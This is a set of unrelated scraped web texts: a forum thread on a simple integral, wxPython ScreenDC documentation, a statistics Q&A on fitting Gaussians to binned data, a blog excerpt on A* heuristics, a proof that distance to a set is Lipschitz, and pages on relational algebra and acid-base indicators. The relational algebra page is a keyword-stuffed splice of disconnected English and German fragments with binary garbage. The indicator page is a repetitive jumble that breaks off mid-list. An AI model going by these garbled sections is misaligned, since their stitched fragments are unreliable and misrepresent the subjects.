I'm not seeing where you're getting a Diff Eq from, when the equation doesn't contain a variable and it's derivative.
S'pose you're right. Either way, it doesn't really matter what you call it. The problem's trivial, whether or not you decide to bring the dt to the other side before you integrate.
--J
Justin Lazear said:
S'pose you're right. Either way, it doesn't really matter what you call it. The problem's trivial, whether or not you decide to bring the dt to the other side before you integrate.
--J
It's no big deal... different strokes for different fo'ks. I was just scared I was missing something, but we're on the same page
I really don't understand why we wouldn't call it a differential equation! It's got the derivative, which is enough for me! But the definition is what the definition is, so. ;)
--J
dextercioby
$$\int_{325000}^{S}dS=\int_{5}^{t} dt \ f(t)$$ |
# relational algebra minimum
Join is cross product followed by select, as noted earlier 3. ∀t 2 ∈ r\{t 1}. These operations are Sum, Count, Average, Maximum and Minimum. Relational Algebra on Bags A bag(or multiset) is like a set, but an element may appear more than once. And plots COUNT(A) as 'frequencyOf_A'. ... Give a relational algebra expression using only the minimum number of operators from $$\left( { \cup ,\, - } \right)$$ w... GATE CSE 1994. What about the row A1A1? Relational Algebra Operations from Set Theory (2/2) INTERSECTION R ∩ S Includes all tuples that are in both R and S SET DIFFERENCE (or MINUS) R – S Includes all tuples that are in R but not in S 16 The CARTESIAN PRODUCT (CROSS PRODUCT) Operation CARTESIAN PRODUCT CROSS PRODUCT or CROSS JOIN Denoted by × Binary set operation Relations do not have to be union compatible Useful when … Set-difference ( ) Tuples in reln. Natural join … Click to share on Facebook (Opens in new window), Click to share on Twitter (Opens in new window), Click to share on Pocket (Opens in new window), Using Relational Algebra to Select Based on Query Results « Coding Linguist. So to get the maximum, we just have to take a projection of Number1 from the theta-join relation above and subtract it from the projection of Number from the original relation. 4. Previous Question Next Question. If you subtract this relation from the cross-product relation, that row will still be there! 2 min read Relational algebra is a procedural query language. It uses various operations to perform this action. Each attribute name must be unique. Active 1 month ago. But its operators have been incorporated into most of the query langua- ges for relational databases in use today (e.g., in SQL). Aggregate Relational Algebra (Maximum) Ask Question Asked 9 years, 7 months ago. Prerequisites – Introduction of Relational Algebra in DBMS, Basic Operators in Relational Algebra The RENAME operation is used to rename the output of a relation. Relational algebra is a mathematical language and thus not particularly user- friendly. SQL, the most important query language for relational databases, is actually a bag language. A number isn’t the maximum if it is less than another number in the relation. min: 0 Reason : Consider that relational division is similar to integer division. xڽVQo�8~ϯ�=� ԚdYV|ok�7,�k���=��� The Set Functions in Relational Algebra. The relational algebra calculator helps you learn relational algebra (RelAlg) by executing it. B. SQL. Set of relational algebra operations {σ, π, ∪, ρ, –, ×} is complete •Other four relational algebra operation can be expressed as a sequence of operations from this set. An operator can be either unary or binary. Relational Algebra Introduction. introduction to relational algebra in dbms. Relational Algebra and Relational Calculus Relational Algebra Using SQL Syntax Summary & Conclusion 4 What is the class about? a theta-join), we will get the values 1, 2, and 3 (but not 4) for the Number1 attribute. Posted on January 24, 2013 April 12, 2013 by Rachel. Give a relational algebra expression using only the minimum number of operators GATE CSE 1994 | Relational Algebra | Database Management System | GATE CSE Input: Logical Query Plan - expression in Extended Relational Algebra; Output: Optimized Logical Query Plan - also in Relational Algebra Given two relations R1 and R2, where R1 contains N1 tuples, R2 contains N2 tuples, and N2>N1> 0, give the minimum and maximum possible sizes (in tuples) for the result relation produced by each of the following relational algebra expressions. We have this relation. Relational algebra is a _____ Data Manipulation Language (DML). Mit anderen Worten: Superschlüssel sind nicht minimal. •Zum Vergleich: arithmetischer Ausdruck (x+2)∗y. It … 3/26/2012 15 29 Relational Algebra uses set operations from set theory, but with added constraints. When working with the relational model, we have 2 groups of operations we can use. For each of the following relational algebra experssions, state in terms of r and s the minimum and maximum number of tuples that could be in the result of the expression. R / S. max : m Reason : when n=0. Set differen… Relational Algebra: Rename the columns of the EMPLOYEE table to LName, FName, DNum and rename the table to EMP. 1 $\begingroup$ This is my database course's homework. Trained(A, B) A trained B . – SQL: Basiert i.w. Sometimes it is simple and suitable to break a complicated sequence of operations and rename it as a relation with different names. 33. In the abovesyntax, R is a relation or name of a table, and the condition is a propositionallogic which uses the relationaloperators like ≥, <,=,>, ≤. Natural Join(⋈): It is a special case of equijoin in which equality condition hold on all attributes which have same name in relations R and S (relations on which join operation is applied). Relational Algebra The Relational Model consists of the elements: relations, which are made up of attributes. This is true to a small extent, algebra is a simple language used to solve problems that can not be solved by numbers alone. The WinRDBI (Windows Relational DataBase Interpreter) educational tool is an integral component of database education at Arizona State University, providing a hands-on approach to understanding the capabilities of the following query languages for relational databases: Relational Algebra; Domain Relational Calculus; Tuple Relational Calculus 7.2 Relationale Algebra. I To process a query, a DBMS translates SQL into a notation similar to relational algebra. find the minimum, maximum, and average salary for staff members 1, but not in reln. This is then translated into an expression of the relational algebra. Try to convert this into relational division How to find the maximum in relational algebra? γ A; COUNT(A)→frequencyOf_A (Trained) Resulting in this: Trained.A frequencyOf_A John 3 Willson 1 Kenny 1 … They accept relations as their input and yield relations as their output. 29 Aggregate Functions Assume the relation EMP has the following tuples: Smith 500 Fin 60000 Union 4. 2 Relational Algebra A relation is a set of attributes with values for each attribute such that: Each attribute value must be a single value only (atomic). SQL queries are translated to relational algebra. Intersection, as above 2. It uses operators to perform queries. Say we have this simple relation of letters and numbers: If we want to identify the maximum value in the number column, we can start by identifying what numbers aren’t the maximum. Viewed 18k times 25. Regeln bzw. Relational algebra is based on a minimal set of operators that can be combined to write complex queries. Relational Algebra Monday, May 10, 2010 Dan Suciu -- 444 Spring 2010 . Relational Algebra (I) Negation Minimum 2016/10/14 Relational Algebra (II) At least 2… More exercises + Questions. it can be categorized as either procedural or nonprocedural. Die relationale Algebra ist so einfach, da das relationale Modell nur ein Konstrukt enth¨alt: die Relation. Example: {1,2,1,3} is a bag. Sometimes it is simple and suitable to break a complicated sequence of operations and rename it as a relation with different names. Join is cross product followed by select, as noted earlier 3. Is it possible to define a minimum operator in relational algebra? Jede Zeile in einer Tabelle ist ein Datensatz (record).Jedes Tupel besteht aus einer Reihe von Attributwerten (Attribute = Eigenschaften), den Spalten der Tabelle.Das Relationenschema legt dabei die Anzahl und den Typ der Attribute für eine Relation fest. Comp 521 – Files and Databases Fall 2014 5 Relational Algebra ! Translating SQL to RA expression is the second step in Query Processing Pipeline . I know how to find the maximum (can do the cross product (renaming as R1 and R2) and then select R1.grade < R2.grade for those who aren't the top, and subtract that from the original database). All values for a given attribute must be of the same type (or domain). Consider a relational database about the International Sled Dog (Husky) Racing Association (ISDRA). Here is the cross-product of the relation and itself (with renamed attributes): If we only take the rows where Number1 < Number2 (i.e. Relational algebra: obtaining the largest value. An operator can be either unary or binary. Project 3. Basic Operators in Relational Algebra. The fundamental operations of relational algebra are as follows − 1. Union: A union of two relations (R1 U R2) can only be performed if the two relations are union compatible. ∀t 1 ∈r. There are mainly three types of extended operators in Relational Algebra: Join; Intersection ; Divide GO TO QUESTION. %PDF-1.6 %���� The first is called relational algebra, and it’s a… Daniel Minimal Blog. T. M. Murali August 30, 2010 CS4604: SQL and Relational Algebra Mit einer geeigneten Abfragesprache können gewünschte Daten aus einer relationalen Datenbank herausgesucht werden. •In relationaler Algebra verkn¨upft man Relationen: π NACHNAME(STUDENTEN σ ATYP=’Z’(BEWERTUNGEN)). Relational Algebra. Gib uns alle Elternpaare: SELECT DISTINCT Vater, Mutter FROM Eltern Eltern: Vater Mutter Hans: Helga Hans: Ursula Martin: Melanie Peter: Christina 2. These are all the values that cannot be the maximum: This is where my brain started to object. 30 Why Bags? It helps me to visualize what’s happening. introduction to relational algebra in dbms. The output of these operations is a new relation, which might be formed from one or more input relations. Cross-product ( ) Allows us to combine two relations. " Relationale Algebra 27 SQL • Hauptunterschied zwischen SQL und rel. Example: {1,2,1,3} is a bag. (a) Declarative (b) Non-Procedural (c) Procedural (d) None of the above. How can I figure out who has trained the most people by using relational algebra or it cannot be expressed in relational algebra? Relational algebra is procedural query language used to query the database in various ways. Ask Question Asked 4 years ago. min: minimum value max: maximum value ... • Pure relational algebra removes all duplicates – e.g. p��vZd��G�r١��{EQ䧏�\$��} y �Z Databases implement relational algebra operators to execute SQL queries. I Relational algebra eases the task of reasoning about queries. It is also called as Declarative DML. They accept relations as their input and yield relations as their output. Relational Algebra A query language is a language in which user requests information from the database. Relational Algebra. Eine Tabelle kann dabei durchaus mehrere Schlüsselkandidaten aufweisen, mit denen sich Datensätze eindeutig identifizieren lassen. Yes, it is possible to express it in relational algebra (RA). The database consisting of the following tables (where the primary keys are underlined): Dogs (did, dname, dob,weight) Mushers (mid, mname) Races (mid, did, race Number Write the relational algebra expression for the following: Find the number of times that each dog has participated in races. Operations from set theory, but with added constraints queries written in SQL ( or multiset is. Years, 7 months ago ) vorstellen, in welchen Datensätze abgespeichert sind BEWERTUNGEN ).... Who has trained the most people by using symbols, such as the x... As noted earlier 3 some operations, along with how to do a sequence of operations and rename relational algebra minimum! As the letters x, y, and coding epiphanies 29 relational algebra query are. The second step in query Processing Pipeline get the values 1, 2, and Z to represent.! Relational database about the International Sled Dog ( Husky ) Racing Association ISDRA. Multiset ) is like learning another language multiset ) is like a set months ago using symbols such... Languages, i.e gives occurrences of relations as their output rename it as relation! A widely used procedural query language is 0 when m=0 written in SQL ( multiset! Course 's homework tuples ) x one single value to compute the desired result minimum the. Be expressed in relational algebra GATE CSE Subject wise and chapter wise with solutions of database Management from... By looking only at the Number1 values, not at the Number1 values, at. Input and gives occurrences of relations as output operations we can not fetch the attributes a! Meaning ( semantics ) of other query languages, i.e domain ) … algebra... Is the same type ( or other languages ) 3 / 7 gives 0 integer! Some operations, along with how to do that for each state i to process a query, DBMS! Of values ( tuples ) x one single value uses set operations from set,! Db a 08/05/2012 M1 Compl at how to do a sequence of operations and rename it as a.. A relationusing this command algebra operators we did n't cover are the semijoin and antijoin user instructs system. Performed recursively on relation and intermediate results are also considered relations database course 's homework other words, relational are... A theta-join ), we need to find the theta-join of our relation and itself for |
# wx.ScreenDC¶
A wx.ScreenDC can be used to paint on the screen.
This should normally be constructed as a temporary stack object; don’t store a wx.ScreenDC object.
When using multiple monitors, wx.ScreenDC corresponds to the entire virtual screen composed of all of them. Notice that coordinates on wx.ScreenDC can be negative in this case, see wx.Display.GetGeometry for more.
## Class Hierarchy¶
Inheritance diagram for class ScreenDC:
## Methods Summary¶
__init__ Constructor. EndDrawingOnTop Use this in conjunction with StartDrawingOnTop . StartDrawingOnTop Use this in conjunction with EndDrawingOnTop to ensure that drawing to the screen occurs on top of existing windows.
## Class API¶
class wx.ScreenDC(DC)
Possible constructors:
ScreenDC()
A ScreenDC can be used to paint on the screen.
### Methods¶
__init__(self)
Constructor.
static EndDrawingOnTop()
Use this in conjunction with StartDrawingOnTop .
This function destroys the temporary window created to implement on-top drawing (X only).
Return type
bool
static StartDrawingOnTop(*args, **kw)
StartDrawingOnTop (window)
Use this in conjunction with EndDrawingOnTop to ensure that drawing to the screen occurs on top of existing windows.
Without this, some window systems (such as X) only allow drawing to take place underneath other windows.
This version of StartDrawingOnTop is used to specify that the area that will be drawn on coincides with the given window. It is recommended that an area of the screen is specified with StartDrawingOnTop because with large regions, flickering effects are noticeable when destroying the temporary transparent window used to implement this feature.
You might use this function when implementing a drag feature, for example as in the wx.SplitterWindow implementation.
Parameters
window (wx.Window) –
Return type
bool
Note
This function is probably obsolete since the X implementations allow drawing directly on the screen now. However, the fact that this function allows the screen to be refreshed afterwards, may be useful to some applications.
StartDrawingOnTop (rect=None)
Use this in conjunction with EndDrawingOnTop to ensure that drawing to the screen occurs on top of existing windows.
Without this, some window systems (such as X) only allow drawing to take place underneath other windows.
This version of StartDrawingOnTop is used to specify an area of the screen which is to be drawn on. If None is passed, the whole screen is available. It is recommended that an area of the screen is specified with this function rather than with StartDrawingOnTop , because with large regions, flickering effects are noticeable when destroying the temporary transparent window used to implement this feature.
You might use this function when implementing a drag feature, for example as in the wx.SplitterWindow implementation.
Parameters
rect (wx.Rect) –
Return type
bool
Note
This function is probably obsolete since the X implementations allow drawing directly on the screen now. However, the fact that this function allows the screen to be refreshed afterwards, may be useful to some applications. |
# Fitting a Gaussian to a histogram when the bin size is significant
I'd like to fit a Gaussian to some experimental data that is binned (the binning is a result of the physical limits of the device). Importantly, the bin size is significant enough that the gaussian cannot be considered flat in the bin window (see pic below). The data is actually 3D but let's just consider the 1D example to start . How does one write a likelihood function for the goodness-of-fit?
My intuition is to simply consider each bin independent and compare the density verses the integrated Gaussian density in the bin window: \begin{align} p(D|\Theta) &= \prod_i^N p(d_i|\Theta) \\ &= \prod_i^N f\left(d_i - \int_{x_i}^{x_{i+1}}\phi(x|\mu,\sigma)dx\right) \end{align} Where N is the number of bins, $d_i$ is the bin height for bin $i$, $\phi(x|\mu,\sigma)$ is the Gaussian PDF, and the integral is over the bin width. My question is: what should I use for $f$? In other words, how is the agreement between $d_i$ and $\phi$ distributed?
• How does this likelihood function change for higher dimensions?
• The integration of a Gaussian over a finite bin size is pretty expensive to compute. Since again my problem is 3D, I'm going to have to do numerical integration MANY times for millions of bins. Is there a faster way to do it?
• Although you discuss goodness of fit, it sounds like what you really want to do is the fitting itself--that is, to estimate the 3D means and covariance matrices. Would this in fact be the case? – whuber Nov 14 '14 at 3:40
• Indeed the goal is to do the fitting. The reason I'm asking for help with the likelihood function is that my eventual goal is to incorporate priors, so everything needs to be probabilistic. If that makes any sense :) – cgreen Nov 14 '14 at 3:44
• Sure, it makes sense. I also think things might not be as bleak as you make out: you likely can get an excellent initial fit by sampling each bin at its center (and computing the density there), and then improve on that fit if you like by slightly intensifying that sampling, such as moving to $8$ points per bin, etc. This actually promises to be faster than if you had all the unbinned data. – whuber Nov 14 '14 at 3:47
• @Neil Yes, I'm sure. Remember, I'm talking about using an approximation to achieve an initial fit quickly and inexpensively and then "polishing" that fit based on the full and correct likelihood. Worked examples of how that polishing step would go are presented at stats.stackexchange.com/a/12491 and stats.stackexchange.com/a/68238. – whuber Nov 14 '14 at 16:24
• @Neil That is correct--but in finding the initial ML approximation it is an unnecessary complication, especially in more than one dimension (where the analog of Sheppard's corrections can be expected to be appropriate only for uncorrelated Gaussians). The idea here is to sneak up on a correct ML solution in two steps: the first step essentially ignores the binning, pretending all data are located either in the bin centers, randomly within their bins, or equally spaced within them; after initial estimates of the parameters are obtained, then a better calculation is performed. – whuber Nov 14 '14 at 17:43
If you know that $y_i \in [x_j, x_{j+1})$, where $x_j$'s are cut points from a bin, then you can treat this as interval censored data. In other words, for your case, you can define your likelihood function as
$\displaystyle \prod_{i = 1}^n (\Phi(r_i|\mu, \sigma) - \Phi(l_i|\mu, \sigma) )$
Where $l_i$ and $r_i$ are the upper and lower limits of the bin which the exact value lines in.
A note is that the log likelihood is not strictly concave for many of the models for interval censored data, but in practice this is not of much consequence.
You should treat each bin as if it were generating random points uniformly within its bounds. Therefore calculate a weighted average for each bin $(x_l, x_h]$ of $E(x) = \frac{x_h + x_l}{2}$ and $E(x^2) = \frac{x_h^2 + x_lx_h + x_l^2}{3}$. This weighted average determines a Gaussian.
You can incorporate a prior by treating this Gaussian as a likelihood.
• That's a little confusing, can you elaborate? I understand the idea of each bin generating uniform points, but what do you mean they determine a Gaussian? – cgreen Nov 14 '14 at 5:00
• The mean and second moment are one way to parametrize a Gaussian. You could have done mean and variance if you like. – Neil G Nov 14 '14 at 5:03
• Ah right of course. Then how do you compare these bin gaussians to the fitting function? – cgreen Nov 14 '14 at 5:05
• It is inconsistent to assume the distribution is Gaussian and is uniform within each bin. That inconsistency is going to cause more and more trouble as the dimension increases. – whuber Mar 1 '15 at 21:37
• @whuber: you're right. I guess this could be a starting point of an iterative approach. – Neil G Mar 1 '15 at 23:36
Given whuber's comment on my last answer, I suggest you use that answer to find a mean and variance $\mu, \sigma^2$ as a starting point. Then, calculate the log-likelihood of having observed the bin counts you got $\ell$. Finally, optimize the mean and variance by gradient descent. It should be easy to calculate the gradients of the log-likelihood with respect the parameters. This log-likelihood seems to me to be convex. |
# properties of heuristics and A*
Let $latex G=(V,E,c)$ be a direct graph with non-negative costs. Also consider a starting vertex $latex s$ and a goal vertex $latex g$. The classic search problem is to find a optimal cost path between $latex s$ and $latex g$. Consider the distance function $latex d:V \times V \to \mathbb R$ induced by the cost $latex c$ (the cost of the minimum cost path). Also, assume the graph $latex G$ is strongly connected. Also let $latex w$ be a real greater or equal to 1.
A heuristic is a function $latex h:V \to \mathbb R$. An heuristic $latex h$ is $latex w-$admissible if $latex h(x) \leq wd(x,g)$ for all $latex x \in v$. A heuristic is $latex w-$consistent if $latex h(g) = 0$ and for all $latex x,y \in V$ such that $latex (x,y) \in E$ we have $latex h(x) \leq wc(x,y) + h(y)$. For $latex w= 1$ we just say…
View original post 1,851 more words
Advertisements
## About Khuram Ali
Programming... Programming and Programming...!!!
Posted on April 27, 2013, in Algorithms, Artificial Intelligence and tagged , , , . Bookmark the permalink. 4 Comments.
• ### Comments 2
1. I do agree with all the ideas you have introduced
to your post. They’re really convincing and can certainly work. Nonetheless, the posts are very quick for beginners. May you please lengthen them a bit from next time? Thanks for the post.
2. You actually make it seem so easy with your presentation but I find this matter to be actually something which I think I
would never understand. It seems too complex and very broad for me.
I’m looking forward for your next post, I’ll try to get the hang of it! |
# Homework Help: Show continuously uniform function
1. May 11, 2009
### aeronautical
Let F be a non-empty subset of a metric room (X,d) and define the function f: X→R through f(x)= inf_{y∈F} d(x,y)= inf {d(x,y):y ∈ F}. Please show that f is continuously uniform in the entire X.
Please note that f(x)= inf_{y∈F} d(x,y) means that y∈F is written below the inf...it is hard to show it on one line, so I chose to show as a subscript...Can anyone tell me how I should begin this problem?
2. May 11, 2009
### quasar987
Strange coincidence, I've been trying to solve the same problem! Well, not exactly the same... I have been trying to show that the map $x\mapsto d(x, F)$ is Lipschitz continuous, meaning that there exists a constant C such that |d(x,F)-d(y,F)|≤Cd(x,y) for all x,y in X. Obviously Lipschitz continuity is stronger than uniform continuity since given ε>0, it suffices to take δ=ε/C. As it turns out, there is an exercise in the book Topology and Geometry of G. Bredon that asks the reader to show that the map $x\mapsto d(x, F)$ is (merely!) continuous. And a hint is provided in suggesting to show that this map is actually Lipschitz of constant C=1. Meaning that, somewhat surprisingly, the easiest way to solve your problem and mine is probably to demonstrate the stronger inequality |d(x,F)-d(y,F)|≤d(x,y) for all x,y in X. So let's try to show this.
3. May 11, 2009
### quasar987
The key for me was to consider first the very special case in which F consists of only two points: F={p,q}. In this scenario, the problem is not so overwhelming psychologically and after solving it, I realized that its solutions admits an immediate generalization to the case of arbitrary F.
The general solution I found is as follows. Tell me what you think.
First, note that we can assume without loss of generality that d(y,F)≤d(x,F) [if not, interchange the labels of x and y...]. In this case, |d(x,F)-d(y,F)|=d(x,F)-d(y,F) and so we must prove that d(x,F)≤d(x,y)+d(y,F) [i.e., we must prove a kind of triangle inequality in which sets are allowed to occupy one of the variable position].
Next, consider {e_n}, {f_n} two sequences of points in F such that d(x,F)=lim d(x,e_n) and d(y,F)=lim d(y,f_n) and further assume that d(x,e_n)≤d(x,f_n) for all n in N.
Then, we have d(x,y)+d(y,f_n) ≥ d(x,f_n) ≥ d(x,e_n) for all n in N and passing to the limit yields the desired conclusion. |
# indicator for weak acid and strong base
what is an indicator? This indicator is totally unsuitable for a strong base / weak acid titration. In addition, some indicators (such as thymol blue) are polyprotic acids or bases, which change color twice at widely separated pH values. The last formula is the same as the Henderson-Hasselbalch equation, which can be used to describe the equilibrium of indicators. You will need to use the BACK BUTTON on your browser to come back here afterwards. Legal. If the concentrations of HLit and Lit - are equal: At some point during the movement of the position of equilibrium, the concentrations of the two colours will become equal. The color change must be easily detected. Therefore, you would want an indicator to change in that pH range. No new choice of indicator can improve the quantitative uncertainty as to how far these unknown moderately strong acids have participated as " strong acids " in an estimation, and, in fact, no improvement is possible unless the acidity of the moderately strong acids is so depressed as to minimize the extent of their interference. In the previous video, we've already found the pH at two points on our titration curve, so we found the pH before we'd added any of our base, we found the pH at this point, and we also found the pH after we added 10 mls of our base, we found the pH at this point. The endpoint is usually detected by adding an indicator. - We've been looking at the titration curve for the titration of a strong acid, HCl, with a strong base, NaOH. This data will give sufficient information about the titration. The equilibrium position is shifted towards the weak acid in in acidic conditions or towards the conjugate base in basic conditions, changing colour as it does so. For methyl orange, we can rearrange the equation for Ka and write: $\mathrm{\dfrac{[In^-]}{[HIn]}=\dfrac{[substance\: with\: yellow\: color]}{[substance\: with\: red\: color]}=\dfrac{\mathit{K}_a}{[H_3O^+]}}$. A. When 24.95 ml of strong base have been added to 25.00 ml of strong base the concentration of the [H+] = (0.05 x 10-3)/0.04995 = … The correct answer is C. In the titration of a weak acid with a strong base, the conjugate base of the weak acid will make the pH at the equivalence point greater than 7. The point at which an indicator changes colors is different for each chemical. Weak Acid and Strong Base Titration Problems. Weak Acid v strong base In this condition only phenolphthalein indicator works … MES is an abbreviation for 2-(N-morpholino)ethanesulfonic acid, which is a weak acid with pKa = 6.27. Weak acid: AH + H 2 O ↔ A-(aq) + H 3 O + (aq) Paul Flowers (University of North Carolina - Pembroke), Klaus Theopold (University of Delaware) and Richard Langley (Stephen F. Austin State University) with contributing authors. Instead, they change over a narrow range of pH. At equilibrium, the following equilibrium equation is established with its conjugate base: what is an indicator? $\begingroup$ As I guess @Maurice mentioned is elsewhere, a rule of thumb to determine an equivalence point pH is the average of the last pKa of acid and pH of strong base, or last 14 -pKb of base, and pH of strong acid. Figure $$\PageIndex{2}$$ shows the approximate pH range over which some common indicators change color and their change in color. Strong acid / weak base will have a low pH (acid side) Strong acid / strong base will have a pH of about 7. Red litmus paper turns blue in the presence of a base. Its pKa value is 3.4. A) Bromthymol Blue PKa = 7.0 B) Indigo Carmine PKa = 13.8 C) Cresol Red PKa = 8.0 D) Methyl Red PKa = 5.1 Not so! We have stated that a good indicator should have a pKin value that is close to the expected pH at the equivalence point. It is possible to calculate the pH of a solution when a weak acid is titrated with a strong base: ⚛ Before any strong base is added to weak acid : [H + (aq)] ≈ √K a [weak acid] pH = −log 10 [H + (aq)] ⚛ Addition of strong base while weak acid is in excess: R.I.C.E. However, it would make sense to titrate to the best possible colour with each indicator. A titration curve reflects the strength of the corresponding acid and base, showing the pH change during titration. Indicators as weak acids. It has a seriously complicated molecule which we will simplify to HLit. Adding hydroxide ions removes the hydrogen ions from the equilibrium which tips to the right to replace them - turning the indicator pink. Textbook content produced by OpenStax College is licensed under a Creative Commons Attribution License 4.0 license. Due to the steepness of the titration curve of a strong acid around the equivalence point, either indicator will rapidly change color at the equivalence point for the titration of the strong acid. Therefore, you would want an indicator to change in that pH range. They are usually weak acids or bases, which when dissolved in water dissociate slightly and form ions. Stronger acids have a larger acid dissociation constant (Ka) and a smaller logarithmic constant (pKa = −log Ka) than weaker acids. They are usually weak acids or bases, which when dissolved in water dissociate slightly and form ions. The equilibrium position is shifted towards the weak acid in in acidic conditions or towards the conjugate base in basic conditions, changing colour as it does so. Bronsted- Lowry defines an acid as a substance that can donate a proton and a base as a substance that can accept a proton. Both methyl orange and … Litmus is a weak acid. Universal indicator also comes with a colour-matching chart, which can be used to determine the approximate pH value of a solution. B + H 2 O ↔ BH + (aq) + OH - (aq) Examples of weak acids and bases are given in the table below. For example, red cabbage juice contains a mixture of colored substances that change from deep red at low pH to light blue at intermediate pH to yellow at high pH (Figure $$\PageIndex{1}$$). pK a of an unknown acid or pK b of the unknown base. (i) Strong acid Vs strong base: Phenolphthalein (pH range 8.3 to 10.5), methyl red (pH range 4.4 – 6.5) and methyl orange (pH range 3.2 to 4.5). On the other hand, using methyl orange, you would titrate until there is the very first trace of orange in the solution. The pH ranges over which two common indicators (methyl red, $$pK_{in} = 5.0$$, and phenolphthalein, $$pK_{in} = 9.5$$) change color are also shown. acid-base system. Acid-base indicators are either weak organic acids or weak organic bases. Therefore, you would want an indicator to change in that pH range. The indicator end point occurs when most of the weak acid has not reacted. Think of what happens half-way through the colour change. Now - having read the above and I hope, understanding this : I now invite you to answer: What indicator would you use for a weak base / strong acid titration. Choosing an Appropriate Indicator for a Weak Acid - Strong Base Titration. Adding hydroxide ions removes the hydrogen ions from the equilibrium which shifts to the right to … Principles that can be applied to titrations, such as adding a small volume of acid, then swirling, can be applied here as well. For our example, phenolphthalein would work really well because it changes in a range of 8 to 10. In contrast, using the wrong indicator for a titration of a weak acid or a weak base can result in relatively large errors, as illustrated in Figure $$\PageIndex{3}$$. (iv) Weak acid vs. weak base: No suitable indicator can be used for such a titration. Acid-Base Indicators. Review key facts, examples, definitions, and theories to prepare for your tests with Quizlet study sets. Selecting Indicators for Acid–Base Titrations Inquiry Guidance and AP* Chemistry Curriculum Alignment Introduction Acids and bases vary in their strength and are normally classified as strong or weak. The above expression describing the indicator equilibrium can be rearranged: $\mathrm{\dfrac{[H_3O^+]}{\mathit{K}_a}=\dfrac{[HIn]}{[In^- ]}}$, $\mathrm{log\left(\dfrac{[H_3O^+]}{\mathit{K}_a}\right)=log\left(\dfrac{[HIn]}{[In^- ]}\right)}$, $\mathrm{log([H_3O^+])-log(\mathit{K}_a)=-log\left(\dfrac{[In^-]}{[HIn]}\right)}$, $\mathrm{-pH+p\mathit{K}_a=-log\left(\dfrac{[In^-]}{[HIn]}\right)}$, $\mathrm{pH=p\mathit{K}_a+log\left(\dfrac{[In^-]}{[HIn]}\right)\:or\:pH=p\mathit{K}_a+log\left(\dfrac{[base]}{[acid]}\right)}$. If the solution becomes red, you are getting further from the equivalence point. Litmus. Download for free at http://cnx.org/contents/85abf193-2bd...a7ac8df6@9.110). For the indicators we've looked at above, these are: Indicators don't change colour sharply at one particular pH (given by their pKind). In all cases, though, a good indicator must have the following properties: Red cabbage juice contains a mixture of substances whose color depends on the pH. base, the pH at the equivalence point can be significantly different than the equivalence point of a titration between a weak acid and a strong base. This the reverse of the Kb reaction for the base A−.Therefore, the equilibrium constant for is K = 1/Kb = 1/(Kw/Ka (for HA)) = 5.4 × 107. A commonly used indicator for strong acid-strong base titrations is phenolphthalein. If we add base, we shift the equilibrium towards the yellow form. Adding only about 25–30 mL of $$NaOH$$ will therefore cause the methyl red indicator to change color, resulting in a huge error. Both methyl orange and bromocresol green change color in an acidic pH range, while phenolphtalein changes in a basic pH. The indicator end point occurs when most of the weak acid has not reacted. Let´s say that 1 drop = 0.05ml from a burette. ahende3. Calculate the pH for the weak acid/strong base titration between 50.0 mL of 0.100 M HCOOH(aq) (formic acid) and 0.200 M NaOH (titrant) at the listed volumes of added base: 0.00 mL, 15.0 mL, 25.0 mL, and 30.0 mL. View more. In contrast, methyl red begins to change from red to yellow around pH 5, which is near the midpoint of the acetic acid titration, not the equivalence point. For example, suppose you had methyl orange in an alkaline solution so that the dominant colour was yellow. At pH = 7.0, the solution is blue. It couldn't distinguish between a weak acid with a pH of 5 or a strong alkali with a pH of 14. B. Bromocresol Green. Goal: Observing acid-base equilibria with the use of bromocresol green indicator dye. Why is phenolphthalein an appropriate indicator for a weak acid-strong base titration? The titration curve demonstrating the pH change during the titration of the strong base with a weak acid shows that at the beginning, the pH changes very slowly and gradually. It distinguishes the pH range from 8 to 9.6. If you use phenolphthalein, you would titrate until it just becomes colourless (at pH 8.3) because that is as close as you can get to the equivalence point. Missed the LibreFest? There is a pH range over which the indicator is useful. Superimposed on it are the pH ranges for methyl orange and phenolphthalein. The reason for the inverted commas around "neutral" is that there is no reason why the two concentrations should become equal at pH 7. To determine pH, use pH paper, universal indicato… In general, for titrations of strong acids with strong bases (and vice versa), any indicator with a pK in between about 4.0 and 10.0 will do. Synthetic indicators have been developed that meet these criteria and cover virtually the entire pH range. C. Phenolphtalein. In that case, they will cancel out of the Kind expression. This is an interesting special case. During the titration of strong acid with strong base the pH changes from 3 to 11, phenolphthalein indicator range from pH 8 to 10 that’s why mostly used for this type of titration. It distinguishes the pH range from 8 to 9.6. Phenolphthalein is an indicator used for titrations of a weak acid and strong base, and itself is a weak acid. An acid-base indicator is either a weak acid or weak base that exhibits a color change as the concentration of hydrogen (H +) or hydroxide (OH-) ions changes in an aqueous solution. Any of the three indicators will exhibit a reasonably sharp color change at the equivalence point of the strong acid titration, but only phenolphthalein is suitable for use in the weak acid titration. This figure shows plots of pH versus volume of base added for the titration of 50.0 mL of a 0.100 M solution of a strong acid (HCl) and a weak acid (acetic acid) with 0.100 M $$NaOH$$. Titration of a weak Acid with a strong base. a weak acid. The next diagram shows the pH curve for adding a strong acid to a strong base. +6 more terms. Review key facts, examples, definitions, and theories to prepare for your tests with Quizlet study sets. There will be an equilibrium established when this acid dissolves in water. The explanation is identical to the litmus case - all that differs are the colours. This range is termed the You can use this to work out what the pH is at this half-way point. An indicator is a substance that has a distinctly different color when in an acidic or basic solution. (ii) Weak acid Vs strong base: Phenolphthalein. This behavior is completely analogous to the action of buffers. a weak acid. However, the graph is so steep at that point that there will be virtually no difference in the volume of acid added whichever indicator you choose. Watch the recordings here on Youtube! The half-way stage happens at pH 9.3. The indicator molecule must not react with the substance being titrated. You obviously need to choose an indicator which changes colour as close as possible to that equivalence point. If you use phenolphthalein or methyl orange, both will give a valid titration result - but the value with phenolphthalein will be exactly half the methyl orange one. Students may already be familiar with it. In the methyl orange case, the half-way stage where the mixture of red and yellow produces an orange colour happens at pH 3.7 - nowhere near neutral. If you re-arrange the last equation so that the hydrogen ion concentration is on the left-hand side, and then convert to pH and pKind, you get: That means that the end point for the indicator depends entirely on what its pKind value is. Blue litmus paper turns red in the presence of an acid. However, the phenolphthalein changes colour exactly where you want it to. This page describes how simple acid-base indicators work, and how to choose the right one for a particular titration. Acid strength is the tendency of an acid, symbolised by the chemical formula HA, to dissociate into a proton, H +, and an anion, A −.The dissociation of a strong acid in solution is effectively complete, except in its most concentrated solutions.. HA → H + + A −. (iii) Strong acid Vs weak base: Methyl red and methyl orange. Methyl Orange. Hence both indicators change color when essentially the same volume of $$NaOH$$ has been added (about 50 mL), which corresponds to the equivalence point. (ii) Weak 